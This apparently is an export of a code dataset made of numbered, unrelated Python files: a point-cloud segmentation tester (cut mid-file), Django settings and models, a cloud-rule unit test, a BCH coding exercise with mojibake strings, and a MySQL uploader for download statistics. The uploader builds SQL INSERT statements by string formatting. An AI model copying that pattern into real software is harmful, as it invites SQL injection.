np.savetxt(ascii_name, preds, fmt='%d')
i_test += 1
t2 = time.time()
print('Done in {:.1f} s\n'.format(t2 - t1))
self.sess.run(dataset.test_init_op)
epoch_ind += 1
i0 = 0
continue
return
def test_cloud_segmentation_on_val(self, model, dataset, num_votes=100):
##########
# Initiate
##########
# Smoothing parameter for votes
test_smooth = 0.95
# Initialise iterator with train data
self.sess.run(dataset.val_init_op)
# Initiate global prediction over test clouds
nc_model = model.config.num_classes
self.test_probs = [np.zeros((l.shape[0], nc_model), dtype=np.float32)
for l in dataset.input_labels['validation']]
self.test_probs_softmax = [np.zeros((l.shape[0], nc_model), dtype=np.float32)
for l in dataset.input_labels['validation']]
# Number of points per class in validation set
val_proportions = np.zeros(nc_model, dtype=np.float32)
i = 0
for label_value in dataset.label_values:
if label_value not in dataset.ignored_labels:
val_proportions[i] = np.sum([np.sum(labels == label_value)
for labels in dataset.validation_labels])
i += 1
# Test saving path
if model.config.saving:
test_path = join('test', model.saving_path.split('/')[-1])
if not exists(test_path):
makedirs(test_path)
if not exists(join(test_path, 'val_predictions')):
makedirs(join(test_path, 'val_predictions'))
if not exists(join(test_path, 'val_probs')):
makedirs(join(test_path, 'val_probs'))
if not exists(join(test_path, 'val_probs_softmax')):
makedirs(join(test_path, 'val_probs_softmax'))
else:
test_path = None
#####################
# Network predictions
#####################
i0 = 0
epoch_ind = 0
last_min = -0.5
mean_dt = np.zeros(2)
last_display = time.time()
while last_min < num_votes:
try:
# Run one step of the model.
t = [time.time()]
ops = (self.prob_logits,
self.prob_logits_softmax,
model.labels,
model.inputs['in_batches'],
model.inputs['point_inds'],
model.inputs['cloud_inds'])
stacked_probs, softmax_probs, labels, batches, point_inds, cloud_inds = self.sess.run(ops, {model.dropout_prob: 1.0})
t += [time.time()]
# Get predictions and labels per instance
# ***************************************
# Stack all validation predictions for each class separately
max_ind = np.max(batches)
for b_i, b in enumerate(batches):
# Eliminate shadow indices
b = b[b < max_ind - 0.5]
# Get prediction (only for the concerned parts)
probs = stacked_probs[b]
sm_probs = softmax_probs[b]
inds = point_inds[b]
c_i = cloud_inds[b_i]
# Update current probs in whole cloud
self.test_probs[c_i][inds] = test_smooth * self.test_probs[c_i][inds] + (1-test_smooth) * probs
self.test_probs_softmax[c_i][inds] = test_smooth * self.test_probs_softmax[c_i][inds] + (1 - test_smooth) * sm_probs
# Average timing
t += [time.time()]
mean_dt = 0.95 * mean_dt + 0.05 * (np.array(t[1:]) - np.array(t[:-1]))
# Display
if (t[-1] - last_display) > 1.0:
last_display = t[-1]
message = 'Epoch {:3d}, step {:3d} (timings : {:4.2f} {:4.2f}). min potential = {:.1f}'
print(message.format(epoch_ind,
i0,
1000 * (mean_dt[0]),
1000 * (mean_dt[1]),
np.min(dataset.min_potentials['validation'])))
i0 += 1
except tf.errors.OutOfRangeError:
# Save predicted cloud
new_min = np.min(dataset.min_potentials['validation'])
print('Epoch {:3d}, end. Min potential = {:.1f}'.format(epoch_ind, new_min))
if last_min + 1 < new_min:
# Update last_min
last_min += 1
# Show vote results (On subcloud so it is not the good values here)
print('\nConfusion on sub clouds')
Confs = []
for i_test in range(dataset.num_validation):
# Insert false columns for ignored labels
probs = self.test_probs_softmax[i_test]
for l_ind, label_value in enumerate(dataset.label_values):
if label_value in dataset.ignored_labels:
probs = np.insert(probs, l_ind, 0, axis=1)
# Predicted labels
preds = dataset.label_values[np.argmax(probs, axis=1)].astype(np.int32)
# Targets
targets = dataset.input_labels['validation'][i_test]
# Confs
Confs += [confusion_matrix(targets, preds, dataset.label_values)]
# Regroup confusions
C = np.sum(np.stack(Confs), axis=0).astype(np.float32)
# Remove ignored labels from confusions
for l_ind, label_value in reversed(list(enumerate(dataset.label_values))):
if label_value in dataset.ignored_labels:
C = np.delete(C, l_ind, axis=0)
C = np.delete(C, l_ind, axis=1)
# Rescale with the right number of point per class
C *= np.expand_dims(val_proportions / (np.sum(C, axis=1) + 1e-6), 1)
# Compute IoUs
IoUs = IoU_from_confusions(C)
mIoU = np.mean(IoUs)
s = '{:5.2f} | '.format(100 * mIoU)
for IoU in IoUs:
s += '{:5.2f} '.format(100 * IoU)
print(s + '\n')
if int(np.ceil(new_min)) % 2 == 0:
# Project predictions
print('\nReproject Vote #{:d}'.format(int(np.floor(new_min))))
t1 = time.time()
files = dataset.train_files
i_val = 0
proj_probs = []
proj_probs_softmax = []
for i, file_path in enumerate(files):
if dataset.all_splits[i] == 0:
# Reproject probs on the evaluations points
probs = self.test_probs[i_val][dataset.validation_proj[i_val], :]
proj_probs += [probs]
probs_sm = self.test_probs_softmax[i_val][dataset.validation_proj[i_val], :]
proj_probs_softmax += [probs_sm]
i_val += 1
t2 = time.time()
print('Done in {:.1f} s\n'.format(t2 - t1))
# Show vote results
print('Confusion on full clouds')
t1 = time.time()
Confs = []
for i_test in range(dataset.num_training):
# Insert false columns for ignored labels
for l_ind, label_value in enumerate(dataset.label_values):
if label_value in dataset.ignored_labels:
proj_probs_softmax[i_test] = np.insert(proj_probs_softmax[i_test], l_ind, 0, axis=1)
proj_probs[i_test] = np.insert(proj_probs[i_test], l_ind, 0, axis=1)
# Get the predicted labels
preds = dataset.label_values[np.argmax(proj_probs_softmax[i_test], axis=1)].astype(np.int32)
# Confusion
targets = dataset.validation_labels[i_test]
Confs += [confusion_matrix(targets, preds, dataset.label_values)]
t2 = time.time()
print('Done in {:.1f} s\n'.format(t2 - t1))
# Regroup confusions
C = np.sum(np.stack(Confs), axis=0)
# Remove ignored labels from confusions
for l_ind, label_value in reversed(list(enumerate(dataset.label_values))):
if label_value in dataset.ignored_labels:
C = np.delete(C, l_ind, axis=0)
C = np.delete(C, l_ind, axis=1)
IoUs = IoU_from_confusions(C)
mIoU = np.mean(IoUs)
s = '{:5.2f} | '.format(100 * mIoU)
for IoU in IoUs:
s += '{:5.2f} '.format(100 * IoU)
print('-' * len(s))
print(s)
print('-' * len(s) + '\n')
# Save predictions
print('Saving clouds')
t1 = time.time()
files = dataset.train_files
i_test = 0
for i, file_path in enumerate(files):
if dataset.all_splits[i] == dataset.training_split:
cloud_name = file_path.split('/')[-1][:-4]
# Get points
points, rgb = dataset.load_evaluation_points_on_train(cloud_name)
# Get the predicted labels
preds = dataset.label_values[np.argmax(proj_probs_softmax[i_test], axis=1)].astype(np.int32)
# Project potentials on original points
pots = dataset.potentials['validation'][i_test][dataset.validation_proj[i_test]]
# Save plys
#cloud_name = file_path.split('/')[-1]
#test_name = join(test_path, 'val_predictions', cloud_name)
#write_ply(test_name,
# [points, preds, pots, dataset.validation_labels[i_test]],
# ['x', 'y', 'z', 'preds', 'pots', 'gt'])
test_name2 = join(test_path, 'val_probs', cloud_name)
prob_names = ['_'.join(dataset.label_to_names[label].split())
for label in dataset.label_values]
write_ply(test_name2,
[points, rgb, dataset.validation_labels[i_test], proj_probs[i_test]],
['x', 'y', 'z', 'red', 'green', 'blue', 'gt'] + prob_names)
#test_name3 = join(test_path, 'val_probs_softmax', cloud_name)
#write_ply(test_name3,
# [points, rgb, dataset.validation_labels[i_test], proj_probs_softmax[i_test]],
# ['x', 'y', 'z', 'red', 'green', 'blue', 'gt'] + prob_names)
i_test += 1
t2 = time.time()
print('Done in {:.1f} s\n'.format(t2 - t1))
self.sess.run(dataset.val_init_op)
epoch_ind += 1
i0 = 0
continue
return
|
995,287 | defa108950f1689d0ce15a28db2a2913582a4b95 | # pylint: disable=missing-docstring
"""
The test module for Prime Factors
"""
|
995,288 | f7ea86207459f8e1cc25a40e3c124abf840f0a8c | from os.path import join as pjoin
import os
from glob import glob
import random
import pandas as pd
import cv2
import numpy as np
import json
from tqdm import tqdm
from random import randint as rint
element_map = {'0':'Button', '1':'CheckBox', '2':'Chronometer', '3':'EditText', '4':'ImageButton', '5':'ImageView',
'6':'ProgressBar', '7':'RadioButton', '8':'RatingBar', '9':'SeekBar', '10':'Spinner', '11':'Switch',
'12':'ToggleButton', '13':'VideoView', '14':'TextView'}
def draw_bounding_box(org, corners, color=(0, 255, 0), line=2, show=False):
board = org.copy()
for i in range(len(corners)):
board = cv2.rectangle(board, (corners[i][0], corners[i][1]), (corners[i][2], corners[i][3]), color, line)
if show:
cv2.imshow('board', board)
cv2.waitKey(0)
return board
def load(input_root, output_root, max_num, show=False):
def random_bbox(img_shape):
# random.seed(seed)
img_height, img_width = img_shape[:2]
height = rint(5, 30)
width = rint(5, 30)
if img_height <= height or img_width <= width:
return None
row_min = rint(0, img_height - height - 1)
col_min = rint(0, img_width - width - 1)
return col_min, row_min, col_min + width, row_min + height
count = 0
image_paths = glob(pjoin(input_root, '*.png'))
for image_path in image_paths:
print(image_path, count)
org = cv2.imread(image_path)
num = int(org.shape[0] / 15)
bboxes = []
for i in range(num):
bbox = random_bbox(org.shape)
if bbox is None:
continue
clip = org[bbox[0]:bbox[2], bbox[1]:bbox[3]]
if clip.shape[0] > 10 and clip.shape[1] > 10:
count += 1
cv2.imwrite(pjoin(output_root, str(count) + '.png'), clip)
bboxes.append(bbox)
if show:
draw_bounding_box(org, bboxes, show=True)
if count > max_num:
return
ROOT_OUTPUT = "E:/Mulong/Datasets/rico/element-noise"
ROOT_INPUT = 'E:/Mulong/Datasets/rico/elements-14/ImageView'
ROOT_IMG = 'E:/Mulong/Datasets/rico/combined'
load(ROOT_INPUT, ROOT_OUTPUT, 20000 - 2104, show=False)
|
995,289 | fbd111da9f4c634ebde88235a4488ac6b346b802 | import unittest
from cloudrail.knowledge.context.aws.resources.redshift.redshift_logging import RedshiftLogging
from cloudrail.dev_tools.rule_test_utils import create_empty_entity
from cloudrail.knowledge.context.aws.resources.redshift.redshift import RedshiftCluster
from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext
from cloudrail.knowledge.rules.aws.non_context_aware.log_validation_rules.ensure_redshift_cluster_logging_enabled_rule import \
EnsureRedshiftClusterLoggingEnabledRule
from cloudrail.knowledge.rules.base_rule import RuleResultType
class TestEnsureRedshiftClusterLoggingEnabledRule(unittest.TestCase):
def setUp(self):
self.rule = EnsureRedshiftClusterLoggingEnabledRule()
def test_non_car_redshift_cluster_logging_enabled__no_logs_field__fail(self):
# Arrange
redshift_cluster: RedshiftCluster = create_empty_entity(RedshiftCluster)
context = AwsEnvironmentContext(redshift_clusters=[redshift_cluster])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.FAILED, result.status)
self.assertEqual(1, len(result.issues))
def test_non_car_redshift_cluster_logging_enabled__logs_not_enabled__fail(self):
# Arrange
redshift_cluster: RedshiftCluster = create_empty_entity(RedshiftCluster)
redshift_logs: RedshiftLogging = create_empty_entity(RedshiftLogging)
redshift_logs.logging_enabled = False
redshift_cluster.logs_config = redshift_logs
context = AwsEnvironmentContext(redshift_clusters=[redshift_cluster])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.FAILED, result.status)
self.assertEqual(1, len(result.issues))
def test_non_car_redshift_cluster_logging_enabled_pass(self):
# Arrange
redshift_cluster: RedshiftCluster = create_empty_entity(RedshiftCluster)
redshift_logs: RedshiftLogging = create_empty_entity(RedshiftLogging)
redshift_logs.logging_enabled = True
redshift_cluster.logs_config = redshift_logs
context = AwsEnvironmentContext(redshift_clusters=[redshift_cluster])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.SUCCESS, result.status)
self.assertEqual(0, len(result.issues))
|
995,290 | 02f170b446322585f8ba0dcaf44f193a88f603ad | s=input()
leng=len(s)
a=0 #0101
b=0 #1010
for i in range(leng):
if i%2==0:
if s[i]=="1":
a+=1
if s[i]=="0":
b+=1
if i%2==1:
if s[i]=="0":
a+=1
if s[i]=="1":
b+=1
if a>=b:
print(b)
else:
print(a) |
995,291 | 8c84184a09a1abd3fe3bc8b0dc785799e012519c | import random
polynomials = {
1: [1, 0, 0, 1, 1],
3: [1, 1, 1, 1, 1],
5: [1, 1, 1]
}
def can_correct(R, max_err):
start = 0
no_more = False
while True:
i = R.find('1', start)
if i == -1:
break
elif no_more:
return False
else:
start = i + 1
count = 0
for j in range(i, len(R)):
if R[j] == '0':
if count >= 1:
no_more = True
start = j
break
count += 1
if count > max_err:
return False
return True
def multiply(a, b):
result = (a if int(b[len(b) - 1]) else 0)
for i in range(len(b) - 1):
result = (a << (i + 1) if int(b[len(b) - i - 2]) else 0) ^ (result)
return result
def bch(msg, d):
gen_polynomial_num = int("".join([str(x) for x in polynomials[1]]), 2)
for i in range(3, d - 1, 2):
gen_polynomial_num = multiply(gen_polynomial_num, polynomials[i])
gen_polynomial = bin(gen_polynomial_num)[2:]
msg += '0' * (15 - len(msg))
R = msg[msg.find('1'):]
while len(R) >= len(gen_polynomial):
for i in range(len(gen_polynomial)):
R = R[:(i)] + str(int(R[i]) ^ int(gen_polynomial[i])) + R[(i + 1):]
R = R[R.find('1'):]
R = '0' * (len(gen_polynomial) - len(R) - 1) + R
return msg[:len(msg) - len(R)] + R
def assert_decode(data, answer):
msg = data[0]
d = data[1]
gen_polynomial_num = int("".join([str(x) for x in polynomials[1]]), 2)
for i in range(3, d - 1, 2):
gen_polynomial_num = multiply(gen_polynomial_num, polynomials[i])
gen_polynomial = bin(gen_polynomial_num)[2:]
print(gen_polynomial, d)
decoded = msg
R = msg
for i in range(len(decoded) - len(gen_polynomial) + 2):
while len(R) >= len(gen_polynomial):
for j in range(len(gen_polynomial)):
R = R[:(j)] + str(int(R[j]) ^ int(gen_polynomial[j])) + R[(j + 1):]
R = R[R.find('1'):]
R = '0' * (len(gen_polynomial) - len(R) - 1) + R
print(decoded, R)
if R.count('1') == 0:
break
elif can_correct(R, (d - 1) // 2):
for j in range(len(decoded) - len(R), len(decoded) - 1):
print(j)
decoded = decoded[:j] \
+ str(int(R[j % (len(decoded) - len(R))]) ^ int(decoded[j])) \
+ decoded[(j + 1):]
for j in range(len(decoded) - i):
decoded = decoded[len(decoded) - 1:] + decoded[:len(decoded) - 1]
break
else:
decoded = decoded[len(decoded) - 1:] + decoded[:len(decoded) - 1]
R = decoded[decoded.find('1'):]
decoded = decoded[:len(decoded) - len(gen_polynomial) + 1]
if not decoded == answer:
return False
return True
def assert_code(data, answer):
if answer == bch(data['message'], int(data['d'])):
return True
return False
def generate_for_encode():
d = [3, 5, 7][random.randint(0, 2)]
k = {
3: 11,
5: 7,
7: 5,
}
msg = "".join([str(random.randint(0, 1)) for x in range(k[d])])
return {'message': msg, 'k': k[d], 'd': d}
def generate_for_decode():
data = generate_for_encode()
msg = data['message']
k = data['k']
d = data['d']
encoded = bch(msg, d);
err = encoded
err_count = random.randint(1, 2)
n = random.randint(0, len(err) - 2)
for i in range(err_count):
err = err[:n+i] + ('0' if err[n+i] == '1' else '1') + err[(n+i + 1):]
if err_count==1:
err_count = str(err_count) + " ะพัะธะฑะบั"
else:
err_count = str(err_count) + " ะพัะธะฑะบะธ"
return {'message': err, 'err_c': err_count, 'd': d}
def get_details():
return {'view_type': 'standard',
'exam_tasks': 2}
def get_name():
return 'ะะงะฅ'
#print(bch('11010', 7))
# print(assert_decode(['111011001000111', 7],'10101'))
# print({'message':'00010', 'd':7}) |
995,292 | 5f2e71045c6ae3c70e89c08fc760f9f886116e88 |
# TODO: support mongo or mysql
class MongoDB:
def __init__(self):
self.host = '127.0.0.1:27071'
|
995,293 | 07e479b7808a8d3069b85bc2f6e967789349c4e7 | """Development settings and globals."""
from os.path import join, normpath
from base import *
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
########## END EMAIL CONFIGURATION
########## CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
########## END CACHE CONFIGURATION
########## TOOLBAR CONFIGURATION
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INSTALLED_APPS += (
'debug_toolbar',
'django_extensions',
)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INTERNAL_IPS = ('127.0.0.1',)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
########## END TOOLBAR CONFIGURATION
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'loggers': {
'django': {
'handlers': ['console'],
'propagate': True,
'level': 'INFO',
},
'profiles': {
'handlers': ['console'],
'propogate': False,
'level': 'DEBUG',
}
}
}
|
995,294 | 2f515c197907d0df648b66a19a20632ec9e99318 | from django.db import models
import uuid
# TYPE
STATUS = [("AE", "Active"), ("IE", "Inactive")]
TYPE = [("HL", "Hospital"), ("PN", "Person")]
TAG = [("BD", "Bed"), ("ONRL", "Oxygen Refill"), ("EYCR", "Empty Cylinder"),
("FLCR", "Full Cylinder"), ("NL", "NULL")]
class AddressModel(models.Model):
entity_id = models.ForeignKey("EntityModel", on_delete=models.CASCADE)
lane = models.CharField(("lane"), max_length=250, db_index=True)
town = models.CharField(("town"), max_length=300, db_index=True)
district = models.CharField(
("district"), max_length=300, db_index=True
)
state = models.CharField(("state"), max_length=300, db_index=True)
contact_phone = models.CharField(max_length=10)
contact_alternate_phone = models.CharField(max_length=10)
email = models.EmailField("email", null=True, blank=True)
class EntityModel(models.Model):
entity_id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
entity_name = models.CharField(max_length=50)
entity_type = models.CharField(max_length=3, choices=TYPE, default="PN")
class ToolsModel(models.Model):
tool_id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
tool_name = models.CharField(max_length=100)
tool_from = models.ForeignKey("EntityModel", on_delete=models.PROTECT)
tool_qty = models.IntegerField(blank=False, null=False)
tool_state = models.CharField(max_length=3, choices=STATUS, default="IE")
class SOSModel(models.Model):
sos_id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
sos_description = models.TextField(blank=False)
sos_from = models.ForeignKey("EntityModel", models.PROTECT)
sos_date = models.DateTimeField(auto_now=True)
sos_state = models.CharField(max_length=3, choices=STATUS, default="IE")
sos_tag = models.CharField(max_length=4, choices=TAG, default="NL")
# Create your models here.
|
995,295 | 31deeb2e59f128050da92eea79538019161e8315 | # __init__.py
from array_summing.array_summing import ArraySumming
__all__ = ['ArraySumming', ]
|
995,296 | 9b9b531559b9620f4b82aa57cd8f1c5159cbdca8 | #!/usr/bin/env python3
"""Upload to database.
Should eventually be combined with categorize tool.
"""
import collections
import getpass
import pymysql
import sys
DownloadSample = collections.namedtuple(
'DownloadSample',
'file ymd hhmm downloads downloads_sha downloads_sig'
' product version arch os extension installer')
def Connect(database):
user=getpass.getuser()
connection = pymysql.connect(
host='localhost',
user=user,
password=getpass.getpass(
prompt='password for %s@%s: ' % (user, database)),
db=database,
charset='utf8',
cursorclass=pymysql.cursors.DictCursor)
return connection
def NoneToNull(s):
if s == 'None':
return ''
return s
def upload_file(file, connection):
with open(file, 'r') as inp:
print('uploading:', file)
with connection.cursor() as cursor:
for line in inp:
# file| ymd | hm | count | #sha | #sig | product | version | arch | os
# extension
parts = line.strip().split('|')
sample = DownloadSample(
file=parts[0],
ymd=parts[1],
hhmm=parts[2],
downloads=parts[3],
downloads_sha=parts[4],
downloads_sig=parts[5],
product=parts[6],
version=NoneToNull(parts[7]),
arch=NoneToNull(parts[8]),
os=NoneToNull(parts[9]),
extension=NoneToNull(parts[10]),
installer=parts[11] == 'installer')
cmd = """INSERT INTO gh_downloads(
sample_date, filename, downloads_total, sha256_total, sig_total,
product, version, arch, os, extension, is_installer)
VALUES(
'%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%d'
)""" % (sample.ymd, sample.file,
sample.downloads, sample.downloads_sha, sample.downloads_sig,
sample.product, sample.version, sample.arch, sample.os,
sample.extension, 1 if sample.installer else 0)
cursor.execute(cmd)
connection.commit()
def main(args):
connection = Connect('metrics')
for file in args:
upload_file(file, connection)
connection.close()
if __name__ == '__main__':
main(sys.argv[1:])
|
995,297 | d3685083d4086a42511f589fed02b94fe83d20b2 | from django.db import models
from django.utils.translation import gettext_lazy as _
from base.models import BaseModel
class Category(BaseModel):
owner = models.ForeignKey('users.User', related_name='owner_categories', verbose_name=_('Owner'),
on_delete=models.CASCADE)
title = models.CharField(_('Title'), max_length=30, db_index=True)
description = models.TextField(_('Description'), blank=True)
class Meta:
ordering = ['title', ]
def __str__(self):
return self.title
class Product(BaseModel):
owner = models.ForeignKey('users.User', related_name='owner_products', verbose_name=_('Owner'),
on_delete=models.CASCADE)
category = models.ForeignKey('products.Category', related_name='category_products', verbose_name=_('Category'),
on_delete=models.SET_NULL, null=True, blank=True)
name = models.CharField(_('Title'), max_length=30, db_index=True)
unit_price = models.FloatField(_('Unit Price'), default=0)
class Meta:
ordering = ['name', ]
def __str__(self):
return self.name
|
995,298 | 84eaf3937054c3cd250c524b92caac50dfce9ab1 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
import json
from prjxray.segmaker import Segmaker
BITS_PER_PARAM = 256
NUM_INITP_PARAMS = 8
NUM_INIT_PARAMS = 0x40
BITS_PER_SITE = BITS_PER_PARAM * (NUM_INITP_PARAMS + NUM_INIT_PARAMS)
def main():
segmk = Segmaker("design.bits")
segmk.set_def_bt('BLOCK_RAM')
print("Loading tags")
'''
'''
with open('params.json') as f:
params = json.load(f)
for param in params:
for initp in range(NUM_INITP_PARAMS):
p = 'INITP_{:02X}'.format(initp)
val = param[p]
for bit in range(BITS_PER_PARAM):
segmk.add_site_tag(
param['site'], "{p}[{bit:03d}]".format(
p=p,
bit=bit,
), val & (1 << bit) != 0)
for init in range(NUM_INIT_PARAMS):
p = 'INIT_{:02X}'.format(init)
val = param[p]
for bit in range(BITS_PER_PARAM):
segmk.add_site_tag(
param['site'], "{p}[{bit:03d}]".format(
p=p,
bit=bit,
), val & (1 << bit) != 0)
segmk.compile()
segmk.write()
if __name__ == "__main__":
main()
|
995,299 | 1dcc5e10f5526d89d1e0a43b122aab26f268fbc8 | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^signup/$', views.signup, name='signup'),
url(r'^success/$', views.success, name='success'),
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.